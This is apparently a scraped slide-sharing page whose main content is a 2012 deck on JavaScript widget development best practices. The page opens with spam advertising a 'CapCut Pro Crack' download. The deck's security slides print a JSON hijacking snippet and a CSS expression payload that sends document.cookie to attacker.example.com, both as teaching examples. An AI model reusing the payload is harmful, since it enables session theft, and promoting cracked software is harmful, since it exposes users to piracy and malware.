CapCut Pro Crack For PC Latest Version {Fully Unlocked} 2025pcprocore 👉𝗡𝗼𝘁𝗲:𝗖𝗼𝗽𝘆 𝗹𝗶𝗻𝗸 & 𝗽𝗮𝘀𝘁𝗲 𝗶𝗻𝘁𝗼 𝗚𝗼𝗼𝗴𝗹𝗲 𝗻𝗲𝘄 𝘁𝗮𝗯> https://pcprocore.com/ 👈◀
CapCut Pro Crack is a powerful tool that has taken the digital world by storm, offering users a fully unlocked experience that unleashes their creativity. With its user-friendly interface and advanced features, it’s no wonder why aspiring videographers are turning to this software for their projects.
A Constitutional Quagmire - Ethical Minefields of AI, Cyber, and Privacy.pdf
A Constitutional Quagmire - Ethical Minefields of AI, Cyber, and Privacy.pdfPriyanka Aash A Constitutional Quagmire - Ethical Minefields of AI, Cyber, and Privacy
Salesforce Summer '25 Release Frenchgathering.pptx.pdf
Salesforce Summer '25 Release Frenchgathering.pptx.pdfyosra Saidani Salesforce Summer '25 Release Frenchgathering.pptx.pdf
You are not excused! How to avoid security blind spots on the way to production
You are not excused! How to avoid security blind spots on the way to productionMichele Leroux Bustamante We live in an ever evolving landscape for cyber threats creating security risk for your production systems. Mitigating these risks requires participation throughout all stages from development through production delivery - and by every role including architects, developers QA and DevOps engineers, product owners and leadership. No one is excused! This session will cover examples of common mistakes or missed opportunities that can lead to vulnerabilities in production - and ways to do better throughout the development lifecycle.
“MPU+: A Transformative Solution for Next-Gen AI at the Edge,” a Presentation...
“MPU+: A Transformative Solution for Next-Gen AI at the Edge,” a Presentation...Edge AI and Vision Alliance For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2025/06/mpu-a-transformative-solution-for-next-gen-ai-at-the-edge-a-presentation-from-fotonation/
Petronel Bigioi, CEO of FotoNation, presents the “MPU+: A Transformative Solution for Next-Gen AI at the Edge” tutorial at the May 2025 Embedded Vision Summit.
In this talk, Bigioi introduces MPU+, a novel programmable, customizable low-power platform for real-time, localized intelligence at the edge. The platform includes an AI-augmented image signal processor that enables leading image and video quality.
In addition, it integrates ultra-low-power object and motion detection capabilities to enable always-on computer vision. A programmable neural processor provides flexibility to efficiently implement new neural networks. And additional specialized engines facilitate image stabilization and audio enhancements.
Hyderabad MuleSoft In-Person Meetup (June 21, 2025) Slides
Hyderabad MuleSoft In-Person Meetup (June 21, 2025) SlidesRavi Tamada Hyderabad MuleSoft In-Person Meetup (June 21, 2025) Slides
2025_06_18 - OpenMetadata Community Meeting.pdf
2025_06_18 - OpenMetadata Community Meeting.pdfOpenMetadata The community meetup was held Wednesday June 18, 2025 @ 9:00 AM PST.
Catch the next OpenMetadata Community Meetup @ https://www.meetup.com/openmetadata-meetup-group/
In this month's OpenMetadata Community Meetup, "Enforcing Quality & SLAs with OpenMetadata Data Contracts," we covered data contracts, why they matter, and how to implement them in OpenMetadata to increase the quality of your data assets!
Agenda Highlights:
👋 Introducing Data Contracts: An agreement between data producers and consumers
📝 Data Contracts key components: Understanding a contract and its purpose
🧑🎨 Writing your first contract: How to create your own contracts in OpenMetadata
🦾 An OpenMetadata MCP Server update!
➕ And More!
cnc-processing-centers-centateq-p-110-en.pdf
cnc-processing-centers-centateq-p-110-en.pdfAmirStern2 מרכז עיבודים תעשייתי בעל 3/4/5 צירים, עד 22 החלפות כלים עם כל אפשרויות העיבוד הדרושות. בעל שטח עבודה גדול ומחשב נוח וקל להפעלה בשפה העברית/רוסית/אנגלית/ספרדית/ערבית ועוד..
מסוגל לבצע פעולות עיבוד שונות המתאימות לענפים שונים: קידוח אנכי, אופקי, ניסור, וכרסום אנכי.
"Scaling in space and time with Temporal", Andriy Lupa.pdf
"Scaling in space and time with Temporal", Andriy Lupa.pdfFwdays Design patterns like Event Sourcing and Event Streaming have long become standards for building real-time analytics systems. However, when the system load becomes nonlinear with fast and often unpredictable spikes, it's crucial to respond quickly in order not to lose real-time operating itself.
In this talk, I’ll share my experience implementing and using a tool like Temporal.io. We'll explore the evolution of our system for maintaining real-time report generation and discuss how we use Temporal both for short-lived pipelines and long-running background tasks.
Security Tips for Enterprise Azure Solutions
Security Tips for Enterprise Azure SolutionsMichele Leroux Bustamante Delivering solutions to Azure may involve a variety of architecture patterns involving your applications, APIs data and associated Azure resources that comprise the solution. This session will use reference architectures to illustrate the security considerations to protect your Azure resources and data, how to achieve Zero Trust, and why it matters. Topics covered will include specific security recommendations for types Azure resources and related network security practices. The goal is to give you a breadth of understanding as to typical security requirements to meet compliance and security controls in an enterprise solution.
AI Agents and FME: A How-to Guide on Generating Synthetic Metadata
AI Agents and FME: A How-to Guide on Generating Synthetic MetadataSafe Software In the world of AI agents, semantics is king. Good metadata is thus essential in an organization's AI readiness checklist. But how do we keep up with the massive influx of new data? In this talk we go over the tips and tricks in generating synthetic metadata for the consumption of human users and AI agents alike.
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdf
Cracking the Code - Unveiling Synergies Between Open Source Security and AI.pdfPriyanka Aash Cracking the Code - Unveiling Synergies Between Open Source Security and AI
9-1-1 Addressing: End-to-End Automation Using FME
9-1-1 Addressing: End-to-End Automation Using FMESafe Software This session will cover a common use case for local and state/provincial governments who create and/or maintain their 9-1-1 addressing data, particularly address points and road centerlines. In this session, you'll learn how FME has helped Shelby County 9-1-1 (TN) automate the 9-1-1 addressing process; including automatically assigning attributes from disparate sources, on-the-fly QAQC of said data, and reporting. The FME logic that this presentation will cover includes: Table joins using attributes and geometry, Looping in custom transformers, Working with lists and Change detection.
10 Key Challenges for AI within the EU Data Protection Framework.pdf
10 Key Challenges for AI within the EU Data Protection Framework.pdfPriyanka Aash 10 Key Challenges for AI within the EU Data Protection Framework
Enhance GitHub Copilot using MCP - Enterprise version.pdf
Enhance GitHub Copilot using MCP - Enterprise version.pdfNilesh Gule Slide deck related to the GitHub Copilot Bootcamp in Melbourne on 17 June 2025
AI vs Human Writing: Can You Tell the Difference?
AI vs Human Writing: Can You Tell the Difference?Shashi Sathyanarayana, Ph.D This slide illustrates a side-by-side comparison between human-written, AI-written, and ambiguous content. It highlights subtle cues that help readers assess authenticity, raising essential questions about the future of communication, trust, and thought leadership in the age of generative AI.
You are not excused! How to avoid security blind spots on the way to production
You are not excused! How to avoid security blind spots on the way to productionMichele Leroux Bustamante
“MPU+: A Transformative Solution for Next-Gen AI at the Edge,” a Presentation...
“MPU+: A Transformative Solution for Next-Gen AI at the Edge,” a Presentation...Edge AI and Vision Alliance
Ad
External JavaScript Widget Development Best Practices (updated) (v.1.1)
- 1. JavaScript Widget Development Best Practices Volkan Özçelik [email protected] 2012-07-29 @ jstanbul http://jstanbul.org/2012
- 2. Who am I? • CTO, cember.net (%100 acquired by Xing AG; RIP) • Project Director, livego.com (gone to deadpool, RIP) • CO-VP of Technology, grou.ps ( http://grou.ps/ ) • JavaScript Engineer, SocialWire ( http://socialwire.com/ ) • J4V45cR1p7 h4x0R, o2.js, ( http://o2js.com/ )
- 3. Other Places to Find Me • http://github.com/v0lkan • http://geekli.st/volkan • http://twitter.com/linkibol • http://linkd.in/v0lkan
- 4. Outline • What is a Widget? / Types of Widgets • Challenges Involved • Versioning • You are not the host, you are the thief. • Shared Environment • Bumping the Cross-Domain Wall • Not Your Grandma’s Cookies • Security • Performance • Questions
- 5. tar -zxvf 30Min.gz http://bit.ly/js-widget (work in progress)
- 6. tar -zxvf 30Min.gz https://github.com/v0lkan/o2.js/tr ee/master/examples/widget-demo
- 7. What is a Widget? • A Distributed Plugin • Source Site ( widget provider ) • Consumer Sites ( publishers ) • Can have a GUI ( weather forecast ) • May not have GUI too ( analytics, statistics ) • Can be Stateful • Can be Stateless
- 8. Versioning Hassle • Types of Versioning: • URL Versioning • Version Number as an Init Parameter • If it ain’t broke, they won’t fix it. • When’s the last time you updated that Wordpress theme? • Nobody will change that darn version number!
- 9. Versioning Hassle • google‘s ga.js 2 hour cache time; • Facebook‘s all.js 15 minute cache time; • twitter‘s widgets.js 30 minute cache time. What part of “Far Future Expires Header” don’t you understand?!
- 10. Versioning Hassle • Far Future Expires Header • Self Cache-Revalidating Scripts: • A Bootloader Script • A JavaScript Beacon: • Returns 204 No Content if versions match, • Returns an auto-loader if versions do not match. • Iframe Refresh • window.location.reload(true)
- 12. Act, but don’t be Seen • You don’t own publisher’s DOM. • Leave minimal trace behind. • Do not slow down publisher. • Do not pollute global namespace.
- 13. Act, but don’t be Seen • Do not extend Object.prototype or Function.prototype. • Show love to the Module Pattern. • Do not slow down publisher: • Async initialization, • Lazy Load. • Do not slow down yourself: • Native is faster, • Use IDs everywhere.
- 14. Environment is Shared • Prefix everything. • I mean… everything!
- 16. Cross Domain Boundary • Modern Methods • CORS • HTML5 window.postMessage API • Hacks • Flash Proxy • Hash Fragment Transport • window.name Transport • Iframe inside an Iframe (klein bottle) • Use Publisher’s Server as a Proxy • JSON with Padding
- 17. Third Party Cookies • Can be disabled by default. • Users may explicitly disable them. • Ad blocker browser plugins may disable them. • You cannot rely on their existence.
- 18. Third Party Cookies • Meaning of ‚disabled‛ varies too • Firefox & Opera: • Server cannot read, client cannot write • We’re tossed! (or are we?) • IE: • Server can read, client cannot write • Webkit (Chrome & Safari): • Server can read, • client can ‚kinda‛ write (iframe post hack)
- 19. Third Party Cookies • Check for 3rd Party Cookie Support First • Don’t jump straight into hacks. • External Windows as a Rescue • A pop-up is considered ‚first party‛ • What about Opera & Firefox ? • Store session ID as a variable. • Pass to the server at each request. • Do not store on publisher’s page! • Use an IFRAME on API domain for security.
- 20. Widget Security • Bottom Line Up Front • Sanitize everything. • First deny everything, then whitelist known good. • Check referrers, have a list of trusted domains. • Do not trust anyone. function Anyone(){} function Publisher(){} Publisher.prototype = new Anyone();
- 21. Widget Security • XSS • Sanitize everything. • Escape < > ; , ‘ ‚ into HTML entities. • CSRF • Use a CSRF token. • Denial of Service • Subdomains per publisher ( publisher1.api.example.com ). • Throttle suspicious requests per subdomain. • Best handled on network / hardware layer. • Session Hijacking • … is a reality. • The only reasonable protection is HTTPS. • Use Multi-Level Authentication.
- 22. Widget Security (lesser known) JSON Hijacking <script> var captured = []; function Array() { for (var i = 0; i < 3; i++) { this[i] setter = function(val) { captured.push(val); }; } } </script> <script src="http://api.example.com/products.json"></script>
- 23. Widget Security (lesser known) CSS Expression Hijacking var _wd_borderColor = '#000;x:expression(var i = new Image; i.src="http://attacker.example.com/?" + document.cookie);';
- 24. Widget Security (lesser known) Clickjacking • Invisible IFRAME positioned on a UI element. Remedy: • Framekiller scripts • X-Frame-Options header • Request confirmation for sensitive actions • Register all your publishers
- 25. Widget Performance • Minimize Initial Payload: • Tiny boot loader, then load dependencies. • Lazy load when possible. • Combine and Minify Assets. • Use CSS Sprites. • Defer images (use a default image, then load original). • Minimize # of HTTP Requests.
- 26. Widget Performance • Minimize Repaint and Reflow. • Rate-limit Server Requests (throttle, debounce). • Yield with setTimeout(fn, 0). • Chunk large arrays of instructions. • Improve Perceived Performance: • Be an optimist: act, then verify.
- 27. Widget Performance • Do not micro-optimize, • Do not optimize prematurely, • Optimizing without measurement is misleading, • It’s hard to measure a third party widget’s performance. • A lot of moving parts involved. • Tools like jsperf.com will not be of much use. • Do not use your 8GB Ram + SSD MacBook for profiling. • Test on an low-grade machine. • Do not forget mobile!